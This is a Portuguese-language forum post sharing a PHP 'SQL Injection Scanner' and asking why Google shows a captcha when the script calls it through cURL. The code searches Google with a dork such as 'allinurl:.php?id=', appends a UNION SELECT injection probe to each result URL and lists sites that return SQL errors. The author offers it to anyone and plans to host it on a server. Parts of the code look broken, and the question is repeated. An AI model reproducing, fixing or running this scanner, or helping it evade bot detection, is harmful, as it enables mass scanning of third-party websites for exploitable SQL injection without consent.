Fala pessoal,
Peguei um scanner na net. Tive que fazer algumas modificações para funcionar.
Agora surgiu um problema, se eu executo a url (da busca do google) no pc funciona, porém, quando chamo via php (curl) aparece uma página do google pedindo para preencher um captcha (para verificar se não é um robô).
Por que isso ocorre somente quando é chamado via php (Curl), sendo que, o IP é o mesmo?
Só estou testando no meu pc; pretendo hospedar em um servidor, já que o link do servidor é melhor e possui outras vantagens.
Segue o Scanner para quem quiser:
Obs: Não sei se postei minha dúvida na categoria correta, caso não esteja, perdoe-me; primeiro post, ainda estou meio perdido. hehe
Peguei um scanner na net. Tive que fazer algumas modificações para funcionar.
Agora surgiu um problema, se eu executo a url (da busca do google) no pc funciona, porém, quando chamo via php (curl) aparece uma página do google pedindo para preencher um captcha (para verificar se não é um robô).
Por que isso ocorre somente quando é chamado via php (Curl), sendo que, o IP é o mesmo?
Só estou testando no meu pc; pretendo hospedar em um servidor, já que o link do servidor é melhor e possui outras vantagens.
Segue o Scanner para quem quiser:
Código:
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Pink Hat SQL Injection Scanner by fvox</title> <style type="text/css"> <!-- .style1 {color: #808080} .style2 {color: #000000; font-weight: bold;} --> </style> </head> <body class="style1"> <center></center> <form id="scan" name="scan" method="post" action=""> <center><tt>Dork:</tt> <input name="dork" type="text" value="allinurl:.php?id=" /> <label> <input type="submit" name="Submit" value="Scan" /> </label> </form> </body> </html> <?php /* SQL Injection Scanner 0.1 by fvox of Pink Hat Contato: synyster@bsdmail.com */ set_time_limit(0); ini_set("max_execution_time", 99999999); if(!extension_loaded('php_curl') && !extension_loaded('curl')) if(!dl('php_curl.so') && !dl('php_curl.dll')) die("Enable cURL extension!"); class Scanner { public function main(){ if(!isset($_POST['dork'])) die; $google = $this->cURL("http://www.google.com.br/search?q=".$_POST['dork']."&num=100"); $search = $google[0]; $search .= $google[1]; $links = $this->getLinks($search); $scan = $this->cURL($links[1]); foreach($links[1] as $link){ $link .= "+and+0=1+union+select+"; $syn = $this->cURL($link); $syn = $syn[0]; if($this->scan($syn)){ echo "<span class='style2'>Site vuln: </span>$link "; flush(); } } } private function scan($site){ if(preg_match("/(ODBC SQL Server Driver|SQL syntax error|mysql_num_rows\(\)|mysql_fetch_array\(\))/i", $site)) return true; } private function getLinks($url){ preg_match_all('/<li class="g"><h3 class="r"><a href="([^"]+)/i', $url, $links); return $links; } private function cURL($url){ $ch = curl_init($url); curl_setopt($ch, CURLOPT_TIMEOUT, 15); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_ENCODING,"gzip,deflate"); $return = curl_exec($ch); //$headerSent = curl_errno($ch); curl_close($ch); return $return; } } $synyster = new Scanner; $synyster->main(); ?>
Comment